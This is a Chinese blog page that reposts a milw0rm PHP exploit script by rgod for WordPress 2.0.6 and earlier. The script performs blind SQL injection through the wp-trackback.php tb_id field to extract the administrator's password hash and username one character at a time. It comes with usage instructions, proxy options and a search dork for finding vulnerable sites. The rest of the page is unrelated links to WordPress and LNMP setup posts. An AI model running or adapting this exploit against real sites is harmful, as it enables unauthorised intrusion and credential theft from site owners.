wp trackback.php,WordPress 's | CN-SEC 中文网

最新推荐文章于 2024-05-04 20:39:10 发布
最新推荐文章于 2024-05-04 20:39:10 发布
阅读量2.3k 收藏
点赞数
文章标签: wp trackback.php
该博客内容涉及一个针对WordPress 2.0.6及更早版本的SQL注入漏洞利用脚本。此脚本利用了`Zend_Hash_Del_Key_Or_Index`函数,并要求`register_globals`设置为开启,同时适用于PHP 4.4.3和5.1.4之前的版本。攻击者可以使用此工具获取管理员用户名和密码的哈希值。
摘要由CSDN通过智能技术生成

来源:milw0rm.com

print_r('

---------------------------------------------------------------------------

WordPress <= 2.0.6 wp-trackback.php Zend_Hash_Del_Key_Or_Index /

/ sql injection admin hash disclosure exploit

(needs register_globals=on, 4 <= PHP < 4.4.3,< 5.1.4)

by rgod

dork: "is proudly powered by WordPress"

mail: retrog at alice dot it

site: http://retrogod.altervista.org

---------------------------------------------------------------------------

');

if ($argc<3) {

print_r('

---------------------------------------------------------------------------

Usage: php '.$argv[0].' host path OPTIONS

host: target server (ip/hostname)

path: path to wordpress

Options:

-p[port]: specify a port other than 80

-P[ip:port]: specify a proxy

-t[prefix]: specify a table prefix (default: wp_)

Example:

php '.$argv[0].' localhost /wordpress/ -P1.1.1.1:80

php '.$argv[0].' localhost / -p81

---------------------------------------------------------------------------

');

die;

}

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);

function quick_dump($string)

{

$result='';$exa='';$cont=0;

for ($i=0; $i<=strlen($string)-1; $i++)

{

if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))

{$result.=" .";}

else

{$result.=" ".$string[$i];}

if (strlen(dechex(ord($string[$i])))==2)

{$exa.=" ".dechex(ord($string[$i]));}

else

{$exa.=" 0".dechex(ord($string[$i]));}

$cont++;if ($cont==15) {$cont=0; $result.="/r/n"; $exa.="/r/n";}

}

return $exa."/r/n".$result;

}

$proxy_regex = '(/b/d{1,3}/./d{1,3}/./d{1,3}/./d{1,3}/:/d{1,5}/b)';

function sendpacketii($packet)

{

global $proxy, $host, $port, $html, $proxy_regex;

if ($proxy=='') {

$ock=fsockopen(gethostbyname($host),$port);

if (!$ock) {

echo 'No response from '.$host.':'.$port; die;

}

}

else {

$c = preg_match($proxy_regex,$proxy);

if (!$c) {

echo 'Not a valid proxy...';die;

}

$parts=explode(':',$proxy);

echo "Connecting to ".$parts[0].":".$parts[1]." proxy.../r/n";

$ock=fsockopen($parts[0],$parts[1]);

if (!$ock) {

echo 'No response from proxy...';die;

}

}

fputs($ock,$packet);

if ($proxy=='') {

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

}

else {

$html='';

while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {

$html.=fread($ock,1);

}

}

fclose($ock);

}

$host=$argv[1];

$path=$argv[2];

$port=80;

$proxy="";

$prefix="wp_";

for ($i=3; $i

$temp=$argv[$i][0].$argv[$i][1];

if ($temp=="-p")

{

$port=str_replace("-p","",$argv[$i]);

}

if ($temp=="-P")

{

$proxy=str_replace("-P","",$argv[$i]);

}

if ($temp=="-t")

{

$prefix=str_replace("-t","",$argv[$i]);

}

}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}

if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$chars[0]=0;//null

$chars=array_merge($chars,range(48,57)); //numbers

$chars=array_merge($chars,range(97,102));//a-f letters

function my_encode($my_string)

{

$encoded="CHAR(";

for ($k=0; $k<=strlen($my_string)-1; $k++)

{

$encoded.=ord($my_string[$k]);

if ($k==strlen($my_string)-1) {$encoded.=")";}

else {$encoded.=",";}

}

return $encoded;

}

echo "/npwd hash -> ";

$j=1;$password="";

while (!strstr($password,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

if (in_array($i,$chars))

{

$sql="999999/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(user_pass,".$j.",1))=".$i."),".my_encode("open").",".my_encode("sun-tzu")."))/**/FROM/**/".$prefix."users/**/WHERE/**/ID=1/*";

$data ="-----------------------------7d61bcd1f033e/r/n";

$data.="Content-Disposition: form-data; name=/"title/";/r/n/r/n";

$data.="1/r/n";

$data.="-----------------------------7d61bcd1f033e/r/n";

$data.="Content-Disposition: form-data; name=/"url/";/r/n/r/n";

$data.="1/r/n";

$data.="-----------------------------7d61bcd1f033e/r/n";

$data.="Content-Disposition: form-data; name=/"blog_name/";/r/n/r/n";

$data.="1/r/n";

$data.="-----------------------------7d61bcd1f033e/r/n";

$data.="Content-Disposition: form-data; name=/"tb_id/";/r/n/r/n";

$data.="$sql/r/n";

$data.="-----------------------------7d61bcd1f033e/r/n";

$data.="Content-Disposition: form-data; name=/"1740009377/";/r/n/r/n";

$data.="1/r/n";

$data.="-----------------------------7d61bcd1f033e/r/n";

$data.="Content-Disposition: form-data; name=/"496546471/";/r/n/r/n";

$data.="1/r/n";

$data.="-----------------------------7d61bcd1f033e--/r/n";

$packet ="POST ".$p."wp-trackback.php?tb_id=1 HTTP/1.0/r/n";

$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e/r/n";

$packet.="Host: ".$host."/r/n";

$packet.="Content-Length: ".strlen($data)."/r/n";

$packet.="Connection: Close/r/n/r/n";

$packet.=$data;

sendpacketii($packet);

if (!eregi("trackbacks are closed",$html)) {$password.=chr($i);echo chr($i);sleep(1);break;}

}

if ($i==255) {

die("/nExploit failed...");

}

}

$j++;

}

echo "/n";

echo "admin user -> ";

$j=1;$admin="";

while (!strstr($admin,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

$sql="999999/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(user_login,".$j.",1))=".$i."),".my_encode("open").",".my_encode("sun-tzu")."))/**/FROM/**/".$prefix."users/**/WHERE/**/ID=1/*";

$data ="-----------------------------7d61bcd1f033e/r/n";

$data.="Content-Disposition: form-data; name=/"title/";/r/n/r/n";

$data.="1/r/n";

$data.="-----------------------------7d61bcd1f033e/r/n";

$data.="Content-Disposition: form-data; name=/"url/";/r/n/r/n";

$data.="1/r/n";

$data.="-----------------------------7d61bcd1f033e/r/n";

$data.="Content-Disposition: form-data; name=/"blog_name/";/r/n/r/n";

$data.="1/r/n";

$data.="-----------------------------7d61bcd1f033e/r/n";

$data.="Content-Disposition: form-data; name=/"tb_id/";/r/n/r/n";

$data.="$sql/r/n";

$data.="-----------------------------7d61bcd1f033e/r/n";

$data.="Content-Disposition: form-data; name=/"1740009377/";/r/n/r/n";

$data.="1/r/n";

$data.="-----------------------------7d61bcd1f033e/r/n";

$data.="Content-Disposition: form-data; name=/"496546471/";/r/n/r/n";

$data.="1/r/n";

$data.="-----------------------------7d61bcd1f033e--/r/n";

$packet ="POST ".$p."wp-trackback.php?tb_id=1 HTTP/1.0/r/n";

$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e/r/n";

$packet.="Host: ".$host."/r/n";

$packet.="Content-Length: ".strlen($data)."/r/n";

$packet.="Connection: Close/r/n/r/n";

$packet.=$data;

sendpacketii($packet);

if (!eregi("trackbacks are closed",$html)) {$admin.=chr($i);echo chr($i);sleep(1);break;}

if ($i==255) {

die("/nExploit failed...");

}

}

$j++;

}

echo "/n";

function is_hash($hash)

{

if (ereg("([a-f0-9]{32})",trim($hash))) {return true;}

else {return false;}

}

if (is_hash($password)) {

echo "exploit succeeded...";

}

else {

echo "exploit failed...";

}

?>

# milw0rm.com [2007-01-10]

程籽籽
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
LAMP环境搭建wordpress
m0_59331971的博客
03-26 916
WordPress解压后的网站文件复制进去 [root@xiudaochengxian ~]# mv wordpress/* /var/www/html/ [root@xiudaochengxian ~]# cd /var/www/html/ [root@xiudaochengxian html]# ll total 208 -rw-r--r-- 1 1006 1006 405 Feb 6 2020 index.php -rw-r--r-- 1 1006 1006 19915 Jan ...
WordPress wp-trackback.php漏洞分析
03-03
本文对WordPress wp-trackback.php漏洞作了分析。
使用docker-compose编排lnmp(dockerfile)完成wordpress
2301_81272194的博客
05-04 1259
【代码】使用docker-compose编排lnmp(dockerfile)完成wordpress
lnmp(linux+nginx+mysql+php)搭建个人博客wordpress--(linux运维19)
欢迎查阅
09-18 859
lnmp搭建个人博客centos71. nginx的安装2. MySQL(mariadb)安装3. php安装4. lnmp之间建立联系4.1 nginx与php4.2 php与mysql之间建立关系5. 博客的搭建5.1blog网站页面:5.2 1. nginx的安装 使用的是yum的安装所以首先要保证虚拟机有网络,前边博客有写nginx安装,这里就直接写安装过程 第一步: vim /etc/yum.repos.d/nginx.repo [nginx-stable] name=nginx stable
LNMP环境搭建WordPress---保证你会系列
m0_57776598的博客
03-19 2972
LNMP搭建wordpress 环境:CentOS7.5 nginx v1.9.1 php v5.4.16 mysql v5.5.68 wordpress wordpress-4.8.1-zh_CN.tar.gz 配置Nginx 1、采用源码包安装Nginx 下载地址:http://nginx.org/download/ [root@mybo ~]# wget http://nginx.org/download/nginx-1.9.1.tar.gz 2、安装编译Nginx的依
docker搭建集群----LNMP的WordPress
MCB134的博客
04-29 799
公司在实际的生产环境中,需要使用 Docker 技术在一台主机上创建 LNMP 服务并运行Wordpress 网站平台。然后对此服务进行相关的性能调优和管理工作wget http://101.34.22.188/lnmp_wordpress/mysql-boost-5.7.20.tar.gzwget http://101.34.22.188/lnmp_wordpress/nginx-1.12.0.tar.gzwget http://101.34.22.188/lnmp_wordpress/php-7.1.1
Linux网站服务之部署Wordpress教程
Small丿Rain丶
04-10 4964
一、环境准备 1、云服务器(最好是国外的服务器或者是家用本地服务器,如果是在阿里云或者腾讯云里买服务器都需要给网站备案)。 2、域名(推荐用免费的域名,或者是在阿里云或者腾讯云里买个域名,做云服务器绑定ip的)。 3、源码包(需要准备lnmp脚本和wordpress包,都需要在官网下载)。 下载链接: 下载WordPress最新版(提取码:srri) 二、环境搭建 1、下载lnmp脚本并且执行。 wget http://soft.vpser.net/lnmp/lnmp1.8.tar.gz -cO lnmp1
系统运维-22-2-LAMP和PHP程序
拙能胜巧
05-06 489
WEB服务的请求流程 Client --> http --> httpd --> cgi --> application server ( program file ) --> mariadb Centos 7 程序包 httpd php php-mysql mariadb-server 注意:php要求httpd使用...
部署开源blog——wordpress
qq_39014511的博客
05-18 538
1、简介 WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。 WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,有许多第三方开发的免费模板,安装方式简单易用。不过要做一个自己的模板,则需要你有一定的专业知识。比如你至少要懂的标准通用标记语言...
lnmp+wordpress之博客部署
qq_50981675的博客
12-18 354
用本地yum源 1、跑lnmp脚本 确定有脚本 [root@localhost ~]# ll total 4228268 -rw-------. 1 root root 1390 Nov 6 16:14 anaconda-ks.cfg -rw-r--r--. 1 root root 4329570304 Jun 7 2019 CentOS-7-x86_64-DVD-1511.iso -rw-r--r--. 1 root root 168639 Nov 17 2020 lnmp1.
WordPress-PHP
06-20
<p>Wordpress是目前最流行的博客程序,一般大家的博客建站程序首选都是WordpressWordpress具有强大的扩展性,由于用户数量非常多,用户自身开发的Wordpress插件及主题等也不断地增强Wordpress的功能,甚至已有使用...
PHP Trackback-开源
05-15
**PHP Trackback 开源详解** Trackback 是一种网络服务,允许网站之间进行双向通信,以通告新内容的存在。它提供了一种方式,让一个网站能够通知另一个网站自己的内容已链接到该网站上的某个页面。PHP Trackback 是...
sablog-x1.6.rar_Sablog_adminfunctions.php_sablog x模板
09-21
6. `trackback.php`:用于实现Trackback功能,让其他博客可以向你的文章发送反馈链接。 7. `rss.php`:生成RSS订阅源,使得用户可以通过RSS阅读器订阅博客的最新内容。 8. `attachment.php`:处理附件上传和管理,...
wordpress.zip
04-15
WordPress是一个极其流行且功能强大的开源内容管理系统(CMS),主要用于创建和管理网站。它基于PHP编程语言,并需要与MySQL数据库协同工作,为用户提供了一个易于使用的界面来发布、编辑和组织各种类型的内容,如...
制造业运营生产一体化整体规划方案.pdf
08-11
制造业运营生产一体化整体规划方案.pdf
软件开发编程重要培训资料分享7软件开发编程开发技术资料.zip
08-11
软件开发编程重要培训资料分享7软件开发编程开发技术资料.zip
毕业设计,基于ASP+SqlServer开发的外观专利图像检索平台,内含完整源代码,数据库,毕业论文
最新发布
08-11
毕业设计,基于ASP+SqlServer开发的外观专利图像检索平台,内含完整源代码,数据库,毕业论文 随着Internet技术的发展,互联网在中国逐步普及,人们对网络的需求也日益增长,利用计算机实现外观专利图像检索平台的管理势在必行。本系统从初步调查开始,详细介绍了需求分析、流程和数据分析,并进行了系统总体结构设计和数据库设计. 系统采用Dreamweaver编写ASP脚本,SQL SERVER建立数据库,从界面简洁、实用的要求出发,完成了外观专利图像检索平台管理工作的主要部分,包括外观专利图像检索平台和用户的信息浏览,添加,修改,删除,查询,并且实现了一些变量的取值,保存,的计算,和统计。 外观专利图像检索平台作为一个新兴的产业近年来取得了迅速的发展,旅行社如雨后春笋遍布全国各省市、目前外观专利图像检索平台行业普遍存在着企业规模小,管理不规范等弱点。外观专利图像检索平台可以把各种外观专利图像检索平台分类存储管理通过网络实现共享,不仅方便快捷,而且不会因为人员流动影响企业的经营,是旅行社在激烈的市场竞争中的坚强后盾。 因此,本文就详细的设计了一个外观专利图像检索平台,把外观专利图像检
Matlab编程车牌识别[Matlab编程].zip
08-11
MATLAB车牌识别系统是一种基于MATLAB开发的软件系统,用于自动识别和提取车辆上的车牌信息。该系统利用计算机视觉和图像处理技术,通过对车牌图像进行分析和处理,实现对车牌号码的自动识别。 该系统的工作流程通常包括以下几个步骤: 1. 车牌图像获取:通过摄像头或者从图像库中获取车辆的图像。 2. 车牌定位:使用图像处理技术,如边缘检测、形态学操作等,对图像进行处理,找出图像中的车牌位置。 3. 字符分割:对车牌进行分割,将每个字符或数字单独提取出来。这一步通常涉及到连通区域分析、投影法等技术。 4. 字符识别:对每个字符进行识别,将其转化为相应的数字或字母。这一步可以使用机器学习技术,如支持向量机(SVM)或深度学习方法,如卷积神经网络(CNN)。 5. 结果输出:将识别结果输出到用户界面或保存到文件中。 MATLAB提供了一系列图像处理和机器学习工具箱,可以大大简化和加速车牌识别系统的开发过程。通过使用MATLAB的图像处理函数和算法库,用户可以快速实现车牌识别的各个步骤,并进行调试和优化。 此外,MATLAB还提供了一些示例代码和教程,可以帮助用户入门和学习车牌识
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值